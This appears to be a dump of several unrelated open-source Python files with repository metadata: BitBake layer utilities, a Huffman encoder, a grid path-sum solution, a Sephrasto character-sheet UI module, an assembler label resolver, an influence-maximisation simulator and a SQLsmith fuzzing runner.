bblayercalls.count('+=') > 1: plusequals = True removelayers_canon = [canonicalise_path(layer) for layer in removelayers] notadded = [] for layer in addlayers: layer_canon = canonicalise_path(layer) if layer_canon in orig_bblayers and not layer_canon in removelayers_canon: notadded.append(layer) notadded_canon = [canonicalise_path(layer) for layer in notadded] addlayers[:] = [layer for layer in addlayers if canonicalise_path(layer) not in notadded_canon] (updated, newlines) = edit_metadata(newlines, ['BBLAYERS'], handle_bblayers) if addlayers: # Still need to add these for addlayer in addlayers: newlines.append('BBLAYERS += "%s"\n' % addlayer) updated = True if updated: with open(bblayers_conf, 'w') as f: f.writelines(newlines) notremoved = list(set(removelayers) - set(removed)) return (notadded, notremoved) def get_file_layer(filename, d): """Determine the collection (as defined by a layer's layer.conf file) containing the specified file""" collections = (d.getVar('BBFILE_COLLECTIONS') or '').split() collection_res = {} for collection in collections: collection_res[collection] = d.getVar('BBFILE_PATTERN_%s' % collection) or '' def path_to_layer(path): # Use longest path so we handle nested layers matchlen = 0 match = None for collection, regex in collection_res.items(): if len(regex) > matchlen and re.match(regex, path): matchlen = len(regex) match = collection return match result = None bbfiles = (d.getVar('BBFILES') or '').split() bbfilesmatch = False for bbfilesentry in bbfiles: if fnmatch.fnmatch(filename, bbfilesentry): bbfilesmatch = True result = path_to_layer(bbfilesentry) if not bbfilesmatch: # Probably a bbclass result = path_to_layer(filename) return result # Constant taken from http://linux.die.net/include/linux/prctl.h PR_SET_PDEATHSIG = 1 class PrCtlError(Exception): pass def signal_on_parent_exit(signame): """ Trigger signame to be sent when the parent process dies """ signum = getattr(signal, signame) # http://linux.die.net/man/2/prctl result = cdll['libc.so.6'].prctl(PR_SET_PDEATHSIG, signum) if result != 0: raise PrCtlError('prctl failed with error code %s' % result) # # Manually call the ioprio syscall. We could depend on other libs like psutil # however this gets us enough of what we need to bitbake for now without the # dependency # _unamearch = os.uname()[4] IOPRIO_WHO_PROCESS = 1 IOPRIO_CLASS_SHIFT = 13 def ioprio_set(who, cls, value): NR_ioprio_set = None if _unamearch == "x86_64": NR_ioprio_set = 251 elif _unamearch[0] == "i" and _unamearch[2:3] == "86": NR_ioprio_set = 289 elif _unamearch == "aarch64": NR_ioprio_set = 30 if NR_ioprio_set: ioprio = value | (cls << IOPRIO_CLASS_SHIFT) rc = cdll['libc.so.6'].syscall(NR_ioprio_set, IOPRIO_WHO_PROCESS, who, ioprio) if rc != 0: raise ValueError("Unable to set ioprio, syscall returned %s" % rc) else: bb.warn("Unable to set IO Prio for arch %s" % _unamearch) def set_process_name(name): from ctypes import cdll, byref, create_string_buffer # This is nice to have for debugging, not essential try: libc = cdll.LoadLibrary('libc.so.6') buf = create_string_buffer(bytes(name, 'utf-8')) libc.prctl(15, byref(buf), 0, 0, 0) except: pass # export common proxies variables from datastore to environment def export_proxies(d): import os variables = ['http_proxy', 'HTTP_PROXY', 'https_proxy', 'HTTPS_PROXY', 'ftp_proxy', 'FTP_PROXY', 'no_proxy', 'NO_PROXY', 'GIT_PROXY_COMMAND'] exported = False for v in variables: if v in os.environ.keys(): exported = True else: v_proxy = d.getVar(v) if v_proxy is not None: os.environ[v] = v_proxy exported = True return exported def load_plugins(logger, plugins, pluginpath): def load_plugin(name): logger.debug(1, 'Loading plugin %s' % name) spec = importlib.machinery.PathFinder.find_spec(name, path=[pluginpath] ) if spec: return spec.loader.load_module() logger.debug(1, 'Loading plugins from %s...' % pluginpath) expanded = (glob.glob(os.path.join(pluginpath, '*' + ext)) for ext in python_extensions) files = itertools.chain.from_iterable(expanded) names = set(os.path.splitext(os.path.basename(fn))[0] for fn in files) for name in names: if name != '__init__': plugin = load_plugin(name) if hasattr(plugin, 'plugin_init'): obj = plugin.plugin_init(plugins) plugins.append(obj or plugin) else: plugins.append(plugin) class LogCatcher(logging.Handler): """Logging handler for collecting logged messages so you can check them later""" def __init__(self): self.messages = [] logging.Handler.__init__(self, logging.WARNING) def emit(self, record): self.messages.append(bb.build.logformatter.format(record)) def contains(self, message): return (message in self.messages)
33.931673
181
0.573518
9c3259e540e7d07de478418013ab2f8954a5e798
3,785
py
Python
module/encodings/huffman/huffman_encoding.py
abraxas767/ezencode
14d870a708c4da1389858f5265c36b930a0e5176
[ "MIT" ]
null
null
null
module/encodings/huffman/huffman_encoding.py
abraxas767/ezencode
14d870a708c4da1389858f5265c36b930a0e5176
[ "MIT" ]
null
null
null
module/encodings/huffman/huffman_encoding.py
abraxas767/ezencode
14d870a708c4da1389858f5265c36b930a0e5176
[ "MIT" ]
null
null
null
from leaf_node import LeafNode import sys sys.path.insert(0, "./encodings/") from abstract_encoding import Encoding class HuffmanEncoding(Encoding): """ This is the implementation of the huffman encoding. """ __leafs = [] __prefix_table = {} # generate prefix table and encode accordingly def encode(self, data: str) -> str: # TODO save the generated prefix table and # append it to the compressed result if data == '': raise ValueError('input cant be empty') self.__prefix_table = {} self.__leafs = [] freq = self.__map_frequencies(data) sorted_freq = self.__sort_frequencies(freq) self.__pair_frequencies(sorted_freq) self.__create_prefix_table() res = "" for char in data: res += self.__prefix_table[char] return res # receives input data and decodes with help of given prefix table def decode(self, data: str) -> str: # TODO Get the prefix table from input # and decode accordingly # reverse the table to be able to access prefixes as keys reverse_table = {val: key for key, val in self.__prefix_table.items()} res = "" tmp = "" for i in data: tmp += i if tmp in reverse_table: res += reverse_table[tmp] tmp = "" return res # nudge recursive tree generation def __create_prefix_table(self) -> None: self.__add_to_prefix_table(self.__leafs[0]) # generate prefix table entries recursivly def __add_to_prefix_table(self, node: object) -> None: if not node.is_numeric: code = "" code += str(node.code) cursor = node while cursor.parent is not None: cursor = cursor.parent if cursor.code is not None: code += str(cursor.code) self.__prefix_table[node.content] = code[::-1] if node.child0 is not None and node.child1 is not None: self.__add_to_prefix_table(node.child0) self.__add_to_prefix_table(node.child1) # create leaf nodes def __pair_frequencies(self, data: dict) -> None: # check if odd if len(data) % 2 != 0: # create a fill node fill_node = LeafNode("xx", 0, False) self.__leafs.append(fill_node) for i in data.items(): leaf_node = LeafNode(i[0], i[1], False) self.__leafs.append(leaf_node) self.__gen_pairs(self.__leafs) # recursive tree generation def __gen_pairs(self, data: list) -> None: pairs = [] while len(data) > 0: l1 = data[-1] del data[-1] l2 = data[-1] del data[-1] pair = LeafNode(l1.content + l2.content, l1.prob + l2.prob, True) pair.set_children(l1, l2) l1.set_parent(pair) l1.set_code(0) l2.set_parent(pair) l2.set_code(1) if len(data) == 1: pairs.append(data[0]) del data[0] pairs.append(pair) pairs.sort(key=lambda x: x.prob, reverse=True) if len(pairs) == 1: self.__leafs = pairs return self.__gen_pairs(pairs) # sort given frequencies alphabetically and according to probability def __sort_frequencies(self, data: dict) -> dict: res = {k: v for k, v in sorted(data.items(), key=lambda item: (item[1], item[0]))} return res # map characters to frequencies def __map_frequencies(self, data: str) -> dict: res = {i : data.count(i) for i in set(data)} return res
33.495575
90
0.56539
92dcf68e6c97a3a805ae8a3355dc92b478a1a5c0
594
py
Python
minimum-path-sum/minimum-path-sum.py
hyeseonko/LeetCode
48dfc93f1638e13041d8ce1420517a886abbdc77
[ "MIT" ]
2
2021-12-05T14:29:06.000Z
2022-01-01T05:46:13.000Z
minimum-path-sum/minimum-path-sum.py
hyeseonko/LeetCode
48dfc93f1638e13041d8ce1420517a886abbdc77
[ "MIT" ]
null
null
null
minimum-path-sum/minimum-path-sum.py
hyeseonko/LeetCode
48dfc93f1638e13041d8ce1420517a886abbdc77
[ "MIT" ]
null
null
null
class Solution: def minPathSum(self, grid: List[List[int]]) -> int: dp=[[0 for _ in range(len(grid[0]))] for _ in range(len(grid))] for row in range(len(grid)): for col in range(len(grid[0])): dp[row][col]=grid[row][col] if row==0 and col==0: continue candidates=set() if col>0: candidates.add(dp[row][col-1]) if row>0: candidates.add(dp[row-1][col]) dp[row][col]+=min(candidates) return dp[-1][-1]
39.6
71
0.451178
b928ec93afb4beed9aa07ca6a042faa5096ea5a0
13,916
py
Python
src/Sephrasto/CharakterAttributeWrapper.py
Ilaris-Tools/Sephrasto
8574a5b45da8ebfa5f69a775066fd3136da1c718
[ "MIT" ]
1
2022-02-02T16:15:59.000Z
2022-02-02T16:15:59.000Z
src/Sephrasto/CharakterAttributeWrapper.py
Ilaris-Tools/Sephrasto
8574a5b45da8ebfa5f69a775066fd3136da1c718
[ "MIT" ]
1
2022-01-14T11:04:19.000Z
2022-01-14T11:04:19.000Z
src/Sephrasto/CharakterAttributeWrapper.py
lukruh/Sephrasto
8574a5b45da8ebfa5f69a775066fd3136da1c718
[ "MIT" ]
null
null
null
# -*- coding: utf-8 -*- """ Created on Fri Mar 10 17:21:49 2017 @author: Lennart """ from Wolke import Wolke import UI.CharakterAttribute from PyQt5 import QtWidgets, QtCore, QtGui import logging import copy from Hilfsmethoden import Hilfsmethoden from EventBus import EventBus import Definitionen class AttrWrapper(QtCore.QObject): ''' Wrapper class for the Attribute setting GUI. Contains methods for updating the GUI elements to the current values and for changing the current values to the values set by the user. ''' modified = QtCore.pyqtSignal() def __init__(self): ''' Initialize the GUI and set signals for the spinners''' super().__init__() logging.debug("Initializing AttrWrapper...") self.form = QtWidgets.QWidget() self.ui = UI.CharakterAttribute.Ui_formAttribute() self.ui.setupUi(self.form) # pre-sort and -filter vorteile to improve performance of tooltip generation self.vorteile = {} for attribut in Definitionen.Attribute: self.vorteile[attribut] = [] for vorteil in sorted(Wolke.DB.vorteile.values(), key = lambda v: v.typ): for attribut in Definitionen.Attribute: if Hilfsmethoden.isAttributVoraussetzung(attribut, vorteil.voraussetzungen): self.vorteile[attribut].append(vorteil) font = QtGui.QFont(Wolke.Settings["FontHeading"], Wolke.Settings["FontHeadingSize"]) font.setBold(True) self.ui.labelWert.setFont(font) self.ui.labelWert.setStyleSheet("color: " + Wolke.HeadingColor + ";}") self.ui.labelWert2.setFont(font) self.ui.labelWert2.setStyleSheet("color: " + Wolke.HeadingColor + ";}") self.ui.labelPW.setFont(font) self.ui.labelPW.setStyleSheet("color: " + Wolke.HeadingColor + ";}") self.ui.labelKosten.setFont(font) self.ui.labelKosten.setStyleSheet("color: " + Wolke.HeadingColor + ";}") self.ui.labelFormel.setFont(font) self.ui.labelFormel.setStyleSheet("color: " + Wolke.HeadingColor + ";}") #Signals self.widgetWert = {} self.widgetKosten = {} self.widgetPW = {} for attribut in Definitionen.Attribute: self.widgetWert[attribut] = getattr(self.ui, "spin" + attribut) self.widgetKosten[attribut] = getattr(self.ui, "labelKosten" + attribut) self.widgetPW[attribut] = getattr(self.ui, "pw" + attribut) self.widgetWert[attribut].setKeyboardTracking(False) self.widgetWert[attribut].valueChanged.connect(self.update) self.ui.spinAsP.valueChanged.connect(self.update) self.ui.spinKaP.valueChanged.connect(self.update) self.currentlyLoading = False def updateTooltip(self, attribut): attribute = copy.deepcopy(Wolke.Char.attribute) attribute[attribut].wert += 1 attribute[attribut].aktualisieren() tooltip = "Eine Steigerung von " + attribut + " auf " + str(attribute[attribut].wert) + " bewirkt:\n" abgeleitetNew = [] scriptAPI = { 'getAttribut' : lambda attribut: attribute[attribut].wert } wsBasis = eval(Wolke.DB.einstellungen["Basis WS Script"].toText(), scriptAPI) mrBasis = eval(Wolke.DB.einstellungen["Basis MR Script"].toText(), scriptAPI) gsBasis = eval(Wolke.DB.einstellungen["Basis GS Script"].toText(), scriptAPI) iniBasis = eval(Wolke.DB.einstellungen["Basis INI Script"].toText(), scriptAPI) dhBasis = eval(Wolke.DB.einstellungen["Basis DH Script"].toText(), scriptAPI) schadensbonusBasis = eval(Wolke.DB.einstellungen["Basis Schadensbonus Script"].toText(), scriptAPI) scriptAPI = { 'getAttribut' : lambda attribut: Wolke.Char.attribute[attribut].wert } wsBasis -= eval(Wolke.DB.einstellungen["Basis WS Script"].toText(), scriptAPI) mrBasis -= eval(Wolke.DB.einstellungen["Basis MR Script"].toText(), scriptAPI) gsBasis -= eval(Wolke.DB.einstellungen["Basis GS Script"].toText(), scriptAPI) iniBasis -= eval(Wolke.DB.einstellungen["Basis INI Script"].toText(), scriptAPI) dhBasis -= eval(Wolke.DB.einstellungen["Basis DH Script"].toText(), scriptAPI) schadensbonusBasis -= eval(Wolke.DB.einstellungen["Basis Schadensbonus Script"].toText(), scriptAPI) if wsBasis != 0: abgeleitetNew.append("Wundschwelle " + ("+" if wsBasis > 0 else "") + str(wsBasis)) if mrBasis != 0: abgeleitetNew.append("Magieresistenz " + ("+" if mrBasis > 0 else "") + str(mrBasis)) if gsBasis != 0: abgeleitetNew.append("Geschwindigkeit " + ("+" if gsBasis > 0 else "") + str(gsBasis)) if iniBasis != 0: abgeleitetNew.append("Initiative " + ("+" if iniBasis > 0 else "") + str(iniBasis)) if schadensbonusBasis != 0: abgeleitetNew.append("Schadensbonus " + ("+" if schadensbonusBasis > 0 else "") + str(schadensbonusBasis)) if dhBasis != 0: abgeleitetNew.append("Durchhaltevermögen " + ("+" if dhBasis > 0 else "") + str(dhBasis)) vortNew = [] if Wolke.Char.voraussetzungenPruefen: for vort in self.vorteile[attribut]: if vort.name in Wolke.Char.vorteile: continue elif Hilfsmethoden.voraussetzungenPrüfen(Wolke.Char.vorteile, Wolke.Char.waffen, Wolke.Char.attribute, Wolke.Char.übernatürlicheFertigkeiten, Wolke.Char.fertigkeiten, vort.voraussetzungen): continue elif Hilfsmethoden.voraussetzungenPrüfen(Wolke.Char.vorteile, Wolke.Char.waffen, attribute, Wolke.Char.übernatürlicheFertigkeiten, Wolke.Char.fertigkeiten, vort.voraussetzungen): vortNew.append(vort.name + " erwerbbar") fertNew = [] ferts = copy.deepcopy(Wolke.Char.fertigkeiten) for fert in sorted(ferts.values(), key = lambda f: f.printclass): fert.aktualisieren(Wolke.Char.attribute) basisAlt = fert.basiswert fert.aktualisieren(attribute) if basisAlt != fert.basiswert: fertNew.append(fert.name + " +" + str(fert.basiswert - basisAlt)) fertsÜberNew = [] ferts = copy.deepcopy(Wolke.Char.übernatürlicheFertigkeiten) more = 0 for fert in sorted(ferts.values(), key = lambda f: f.printclass): if len(fert.gekaufteTalente) == 0: more += 1 continue fert.aktualisieren(Wolke.Char.attribute) basisAlt = fert.basiswert fert.aktualisieren(attribute) if basisAlt != fert.basiswert: fertsÜberNew.append(fert.name + " +" + str(fert.basiswert - basisAlt)) if more > 0: fertsÜberNew.append(str(more) + " ungenutzte übernat. Fertigkeiten +1") tooltipAdd = [] for infos in [abgeleitetNew, fertNew, fertsÜberNew, vortNew]: tooltipAdd += infos if len(infos) > 0: tooltipAdd.append("") if len(tooltipAdd) > 0: tooltipAdd.pop() tooltip += "\n".join(tooltipAdd) else: tooltip = tooltip[:-2] + " keine weiteren Verbesserungen." self.widgetWert[attribut].setToolTip(tooltip) def checkConsequences(self, attribut, wert): attribute = copy.deepcopy(Wolke.Char.attribute) attribute[attribut].wert = wert attribute[attribut].aktualisieren() remove = Wolke.Char.findUnerfüllteVorteilVoraussetzungen(attribute=attribute) if remove: messageBox = QtWidgets.QMessageBox() messageBox.setIcon(QtWidgets.QMessageBox.Question) messageBox.setWindowTitle(attribut + " senken") messageBox.setText("Wenn du " + attribut + " auf " + str(wert) + " senkst, verlierst du die folgenden Vorteile:") remove.append("\nBist du sicher?") messageBox.setInformativeText("\n".join(remove)) messageBox.addButton(QtWidgets.QPushButton("Ja"), QtWidgets.QMessageBox.YesRole) messageBox.addButton(QtWidgets.QPushButton("Abbrechen"), QtWidgets.QMessageBox.RejectRole) result = messageBox.exec_() return result == 0 return True def updateAttribut(self, attribut): changed = False uiElement = self.widgetWert[attribut] if Wolke.Char.attribute[attribut].wert != uiElement.value(): if self.checkConsequences(attribut, uiElement.value()): Wolke.Char.attribute[attribut].wert = uiElement.value() Wolke.Char.attribute[attribut].aktualisieren() changed = True else: uiElement.setValue(Wolke.Char.attribute[attribut].wert) for attribut in Definitionen.Attribute: self.updateTooltip(attribut) return changed def update(self): if self.currentlyLoading: return ''' Set and refresh all Attributes ''' changed = False for attribut in Definitionen.Attribute: if self.updateAttribut(attribut): changed = True if Wolke.Char.asp.wert != self.ui.spinAsP.value(): Wolke.Char.asp.wert = self.ui.spinAsP.value() changed = True if Wolke.Char.kap.wert != self.ui.spinKaP.value(): Wolke.Char.kap.wert = self.ui.spinKaP.value() changed = True if changed: self.modified.emit() self.updateDerivedValues() def getSteigerungskostenAsP(self): val = (Wolke.Char.asp.wert + 1) * Wolke.Char.asp.steigerungsfaktor return "(<span style='font-size: 9pt; font-weight: " + Hilfsmethoden.qtWeightToCSS(QtGui.QFont.Black) + "; font-family: \"Font Awesome 6 Free Solid\";'>\uf176</span>&nbsp;&nbsp;" + str(EventBus.applyFilter("asp_kosten", val, { "charakter" : Wolke.Char, "wert" : Wolke.Char.asp.wert })) + " EP)" def getSteigerungskostenKaP(self): val = (Wolke.Char.kap.wert + 1) * Wolke.Char.kap.steigerungsfaktor return "(<span style='font-size: 9pt; font-weight: " + Hilfsmethoden.qtWeightToCSS(QtGui.QFont.Black) + "; font-family: \"Font Awesome 6 Free Solid\";'>\uf176</span>&nbsp;&nbsp;" + str(EventBus.applyFilter("asp_kosten", val, { "charakter" : Wolke.Char, "wert" : Wolke.Char.kap.wert })) + " EP)" def getAttributSteigerungskosten(self, attr): attribut = Wolke.Char.attribute[attr] val = (attribut.wert + 1) * attribut.steigerungsfaktor return "<span style='font-size: 9pt; font-weight: " + Hilfsmethoden.qtWeightToCSS(QtGui.QFont.Black) + "; font-family: \"Font Awesome 6 Free Solid\";'>\uf176</span>&nbsp;&nbsp;" + str(EventBus.applyFilter("attribut_kosten", val, { "charakter" : Wolke.Char, "attribut" : attr, "wert" : attribut.wert + 1 })) + " EP" def updateDerivedValues(self): for attribut in Definitionen.Attribute: self.widgetPW[attribut].setValue(Wolke.Char.attribute[attribut].wert*2) self.widgetKosten[attribut].setText(self.getAttributSteigerungskosten(attribut)) self.ui.abWS.setValue(Wolke.Char.ws) self.ui.abGS.setValue(Wolke.Char.gs) self.ui.abIN.setValue(Wolke.Char.ini) self.ui.abMR.setValue(Wolke.Char.mr) self.ui.abSB.setValue(Wolke.Char.schadensbonus) self.ui.abDH.setValue(Wolke.Char.dh) self.ui.labelKostenAsP.setText(self.getSteigerungskostenAsP()) self.ui.labelKostenKaP.setText(self.getSteigerungskostenKaP()) def load(self): self.currentlyLoading = True ''' Load all values and derived values ''' for attribut in Definitionen.Attribute: self.widgetWert[attribut].setValue(Wolke.Char.attribute[attribut].wert) self.updateTooltip(attribut) self.ui.abAsP.setValue(Wolke.Char.aspBasis + Wolke.Char.aspMod) self.ui.abKaP.setValue(Wolke.Char.kapBasis + Wolke.Char.kapMod) if "Zauberer I" in Wolke.Char.vorteile: self.ui.spinAsP.setEnabled(True) self.ui.spinAsP.setValue(Wolke.Char.asp.wert) else: self.ui.spinAsP.setValue(0) self.ui.spinAsP.setEnabled(False) self.ui.lblKap.setText("KaP") self.ui.lblKapZugekauft.setText("Karmaenergie") self.ui.lblKapZugekauft.setToolTip("<html><head/><body><p>Als Geweihter stellt dir deine Gottheit Karmaenergie zur Verfügung: "\ "Die Vorteile Geweiht I/II/III/IV verleihen dir 8/16/24/32 Karmapunkte (KaP), die du für Liturgien nutzen kannst. "\ "Du kannst diesen Vorrat an maximalen KaP durch den Zukauf nach Steigerungsfaktor 1 erhöhen.</p></body></html>") if "Geweiht I" in Wolke.Char.vorteile: self.ui.spinKaP.setEnabled(True) self.ui.spinKaP.setValue(Wolke.Char.kap.wert) elif "Paktierer I" in Wolke.Char.vorteile: self.ui.spinKaP.setEnabled(True) self.ui.spinKaP.setValue(Wolke.Char.kap.wert) self.ui.lblKap.setText("GuP") self.ui.lblKapZugekauft.setText("Gunstpunkte") self.ui.lblKapZugekauft.setToolTip("<html><head/><body><p>Ein Paktierer selbst verfügt nicht über übernatürliche Macht, sondern "\ "erbittet den Beistand seines Erzdämonen: Der Vorteil Paktierer I/II/III/IV verleiht ihm 8/16/24/32 Gunstpunkte (GuP), "\ "mit denen er den Erzdämon anrufen kann. GuP werden nach Steigerungsfaktor 1 gesteigert. Meist geschieht das, wenn der Paktierer "\ "ohnehin einen Kreis der Verdammnis aufsteigt oder dem Erzdämonen auf andere Weise nahe ist.</p></body></html>") else: self.ui.spinKaP.setValue(0) self.ui.spinKaP.setEnabled(False) self.updateDerivedValues() self.currentlyLoading = False
49.878136
322
0.64257
b9a758d95904be8229412da42c0516b18ac23aa9
3,957
py
Python
Assembler/labels.py
Laegluin/mikrorechner
7e5e878072c941e422889465c43dea838b83e5fd
[ "MIT" ]
1
2019-01-28T01:53:20.000Z
2019-01-28T01:53:20.000Z
Assembler/labels.py
Laegluin/mikrorechner
7e5e878072c941e422889465c43dea838b83e5fd
[ "MIT" ]
null
null
null
Assembler/labels.py
Laegluin/mikrorechner
7e5e878072c941e422889465c43dea838b83e5fd
[ "MIT" ]
null
null
null
import datastrings import re import exceptions as error def process_labels(commands): try: return replace_labels_with_values(commands) except (error.label_duplicate_error,error.label_replacement_not_successful_error) as err: print(err.string) raise error.binary_file_not_creatable_exception('Binary File will not be created. Process has stoppd') def replace_labels_with_values(commands): label_list = get_label_adress_dictionary(commands) label_values = get_label_values_dictionary(commands) commands_with_reljumps = commands labelname_options = '|'.join(label_list) addr = 0 print('Input after replacing and cutting down Labels, with adresses') for line, command in enumerate(commands): if re.match('(jump)\s+(to)\s+(' + labelname_options + ')\s*(_\w+\s*)?(\s+#(.)*)?$', command): dest = label_list[command.split()[2]] - addr if dest - 4 > 0: commands_with_reljumps[line] = 'jump_rel to ' + str(dest) else: commands_with_reljumps[line] = 'jump_rel to ' + str(dest) elif re.match('(jump_if)\s+(to)\s+(' + labelname_options + ')\s*(_\w+\s*)?$', command): dest = label_list[command.split()[2]] - addr if dest - 4 > 0: commands_with_reljumps[line] = 'jump_rel_if to ' + str(dest) else: commands_with_reljumps[line] = 'jump_rel_if to ' + str(dest) elif re.match('(R)\d{1,2}\s+(=)\s+(' + labelname_options + ')\s*$', command): words = command.split() replacement = replace_register_equals_label(words[0],label_values[words[2]]) commands_with_reljumps = commands_with_reljumps[:line] + replacement + commands_with_reljumps[line+1:] print(str(addr) + ':\t' + str(commands_with_reljumps[line])) try: addr += datastrings.necessary_byte_storage(command) except error.data_string_not_convertible_error: raise error.label_replacement_not_successful_error('Label konnten nicht ersetzt werden') print('\n') return commands_with_reljumps #welches register dürfen wir zum zwischenspeichern benutzen? def replace_register_equals_label(register, value): if datastrings.is_datastring(value): val = int(value,0) if val < 0: binary_string = '{0:{fill}{width}b}'.format((-124 + 2 ** 32) % 2 ** 32, fill='0', width=32) else: binary_string = '{0:{fill}{width}b}'.format(val, fill='0', width=32) replacement = [register + " = 0b" + binary_string[0:21], "R3 = 11", register + " = " + register + " << R3 times", "R3 = 0b" + binary_string[21:], register + " = " + register + " | R3"] return replacement return [] def get_label_adress_dictionary(commands): addr = 0 label_duplicate = 0 labels = {} for line, command in enumerate(commands): if(re.match(r'(.)*\s+(_)[A-Za-z0-9_-]+\s*$',command)): label_name = command.split()[-1][1:] for labelName in labels: if labelName == label_name: label_duplicate = 1 if not label_duplicate: labels[label_name] = addr else: raise error.label_duplicate_error('Line ' + str(line+1) + ': Labelname ' + label_name + ' zweimal deklariert!') try: addr += datastrings.necessary_byte_storage(command) except error.data_string_not_convertible_error: print('Line ' + str(line+1) + ': datastring '+ command +'not convertible!') return labels def get_label_values_dictionary(commands): labels_and_values = {} for line, command in enumerate(commands): if(re.match(r'(.)*\s+(_)[A-Za-z0-9_-]+\s*$',command)): label_name = command.split()[-1][1:] labels_and_values[label_name] = re.sub(r'_[A-Za-z0-9_-]+\s*$','',command) return labels_and_values # if __name__ == '__main__': # start(sys.argv[0])
50.088608
144
0.628506
e06a857fedc36a097de58ff641e29f6ee75a71f1
3,883
py
Python
CS303/lab7-9/work/ISE/ISE.py
Wycers/Codelib
86d83787aa577b8f2d66b5410e73102411c45e46
[ "MIT" ]
22
2018-08-07T06:55:10.000Z
2021-06-12T02:12:19.000Z
CS303/lab7-9/work/ISE/ISE.py
Wycers/Codelib
86d83787aa577b8f2d66b5410e73102411c45e46
[ "MIT" ]
28
2020-03-04T23:47:22.000Z
2022-02-26T18:50:00.000Z
CS303/lab7-9/work/ISE/ISE.py
Wycers/Codelib
86d83787aa577b8f2d66b5410e73102411c45e46
[ "MIT" ]
4
2019-11-09T15:41:26.000Z
2021-10-10T08:56:57.000Z
from queue import Queue import multiprocessing as mp import time import sys import argparse import os import random import numpy as np worker_num = 8 epoch = 2000 class Node: def __init__(self, name, threshold=None): self.name = name self.next = [] self.weight = [] class Worker(mp.Process): def __init__(self): super(Worker, self).__init__(target=self.start) self.inQ = mp.Queue() self.outQ = mp.Queue() def run(self): while True: model, nodes, seeds = self.inQ.get() if model == 'IC': self.outQ.put(IC(nodes, seeds)) elif model == 'LT': self.outQ.put(LT(nodes, seeds)) def IC(nodes, seeds): random.seed(int(os.getpid() + time.time() * 1e3 + 114514)) cnt = 0 queue = [] acted = [0]* len(nodes) for i in seeds: queue.append(i) acted[i.name] = 1 cnt = cnt + 1 while(len(queue) != 0): for i in range(len(queue[0].next)) : if acted[queue[0].next[i].name] == 0 : ret = random.random() if ret <= queue[0].weight[i] : cnt = cnt + 1 acted[queue[0].next[i].name] = 1 queue.append(queue[0].next[i]) del queue[0] return sum([1 for node in nodes if acted[node.name]]) def LT(nodes, seeds): random.seed(int(os.getpid() + time.time() * 1e3 + 114514)) queue = [[], []] now = 0 acted = [False] * len(nodes) threshold = [random.random() for _ in nodes] for i in seeds: queue[now].append(i) while len(queue[now]) > 0: for u in queue[now]: acted[u.name] = True for i in range(len(u.next)): threshold[u.next[i].name] -= u.weight[i] for u in queue[now]: for i in range(len(u.next)): if acted[u.next[i].name]: continue if threshold[u.next[i].name] > 0: continue queue[now ^ 1].append(u.next[i]) acted[u.next[i].name] = True queue[now] = [] now ^= 1 return sum([1 for node in nodes if acted[node.name]]) if __name__ == '__main__': start = time.time() parser = argparse.ArgumentParser() parser.add_argument('-i', '--file_name', type=str, default='network.txt') parser.add_argument('-s', '--seed', type=str, default='seed1.txt') parser.add_argument('-m', '--model', type=str, default='IC') parser.add_argument('-t', '--time_limit', type=int, default=120) args = parser.parse_args() time_limit = args.time_limit nodes = [] with open(args.file_name) as f: line = f.readline() tmp = line.split(' ') N = int(tmp[0]) for i in range(N+1): nodes.append(Node(int(i))) for line in f: tmp = line.split(' ') l = int(tmp[0].strip()) r = int(tmp[1].strip()) w = float(tmp[2].strip()) nodes[l].next.append(nodes[r]) nodes[l].weight.append(w) seeds = [] with open(args.seed) as f: for line in f: tmp = int(line.strip()) seeds.append(nodes[tmp]) sys.setrecursionlimit(1000000) if worker_num == 0 or epoch == 0: exit(0) random.seed(int(os.getpid() + time.time() * 1e3 + 114514)) workers = [] for i in range(worker_num): workers.append(Worker()) workers[i].start() data = (args.model, nodes, seeds) for i in range(epoch): workers[i % worker_num].inQ.put(data) totalsum = 0 for i in range(epoch): totalsum += workers[i % worker_num].outQ.get() print(totalsum/epoch) # print(time.time() - start) for w in workers: w.terminate() sys.stdout.flush()
24.732484
77
0.523822
0ef0f3a4830852c838985588d6408ba9048c6404
176
py
Python
app/admin/__init__.py
uosorio/heroku_face
7d6465e71dba17a15d8edaef520adb2fcd09d91e
[ "Apache-2.0" ]
73
2018-12-14T18:12:33.000Z
2022-02-23T21:39:59.000Z
app/admin/__init__.py
uosorio/heroku_face
7d6465e71dba17a15d8edaef520adb2fcd09d91e
[ "Apache-2.0" ]
4
2019-11-23T18:08:18.000Z
2021-08-23T09:00:15.000Z
app/admin/__init__.py
uosorio/heroku_face
7d6465e71dba17a15d8edaef520adb2fcd09d91e
[ "Apache-2.0" ]
33
2019-06-03T00:30:57.000Z
2022-03-10T23:54:43.000Z
""" AUTOR: Juanjo FECHA DE CREACIÓN: 24/05/2019 """ from flask import Blueprint admin_bp = Blueprint('admin', __name__, template_folder='templates') from . import routes
12.571429
68
0.727273
161c7247d8f7e839d50d1d287907b990848d49ad
1,288
py
Python
scripts/runsqlsmith.py
AldoMyrtaj/duckdb
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
[ "MIT" ]
2,816
2018-06-26T18:52:52.000Z
2021-04-06T10:39:15.000Z
scripts/runsqlsmith.py
AldoMyrtaj/duckdb
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
[ "MIT" ]
1,310
2021-04-06T16:04:52.000Z
2022-03-31T13:52:53.000Z
scripts/runsqlsmith.py
AldoMyrtaj/duckdb
3aa4978a2ceab8df25e4b20c388bcd7629de73ed
[ "MIT" ]
270
2021-04-09T06:18:28.000Z
2022-03-31T11:55:37.000Z
# run SQL smith and collect breaking queries import os import re import subprocess import sys import sqlite3 from python_helpers import open_utf8 sqlsmith_db = 'sqlsmith.db' sqlsmith_test_dir = 'test/sqlsmith/queries' export_queries = False con = sqlite3.connect(sqlsmith_db) c = con.cursor() if len(sys.argv) == 2: if sys.argv[1] == '--export': export_queries = True elif sys.argv[1] == '--reset': c.execute('DROP TABLE IF EXISTS sqlsmith_errors') else: print('Unknown query option ' + sys.argv[1]) exit(1) if export_queries: c.execute('SELECT query FROM sqlsmith_errors') results = c.fetchall() for fname in os.listdir(sqlsmith_test_dir): os.remove(os.path.join(sqlsmith_test_dir, fname)) for i in range(len(results)): with open(os.path.join(sqlsmith_test_dir, 'sqlsmith-%d.sql' % (i + 1)), 'w+') as f: f.write(results[i][0] + "\n") exit(0) def run_sqlsmith(): subprocess.call(['build/debug/third_party/sqlsmith/sqlsmith', '--duckdb=:memory:']) c.execute('CREATE TABLE IF NOT EXISTS sqlsmith_errors(query VARCHAR)') while True: # run SQL smith run_sqlsmith() # get the breaking query with open_utf8('sqlsmith.log', 'r') as f: text = re.sub('[ \t\n]+', ' ', 